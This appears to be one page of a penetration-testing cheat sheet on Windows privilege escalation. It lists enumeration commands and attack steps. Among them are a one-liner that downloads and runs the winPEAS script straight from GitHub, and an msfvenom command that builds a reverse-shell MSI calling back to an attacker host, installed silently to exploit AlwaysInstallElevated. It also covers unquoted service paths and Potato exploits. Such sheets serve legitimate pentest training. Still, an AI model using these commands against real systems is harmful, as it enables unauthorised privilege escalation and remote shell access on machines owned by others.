🪟 Windows Privilege Escalation
Check for misconfigs, vulnerable services, and abuse of privileges.
➡️ Environment: See 00_environment_setup
🔍 Basic Enum
systeminfo
whoami /priv
net user
ipconfig /all🧰 Tools
WinPeas.ps1:
iwr -UseBasicParsing "https://raw.githubusercontent.com/peass-ng/PEASS-ng/refs/heads/master/winPEAS/winPEASps1/winPEAS.ps1" | iex
🪜 AlwaysInstallElevated
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
# If both = 1 → generate MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f msi > shell.msi
msiexec /quiet /qn /i shell.msi🔧 Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\\Windows\\"
# If any spaces in path without quotes → replace first binary🔐 SeImpersonatePrivilege
Use Juicy Potato, PrintSpoofer, or RoguePotato if enabled.
whoami /priv | findstr SeImpersonatePrivilege📡 Registry Auto-run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunNext: 06_active_directory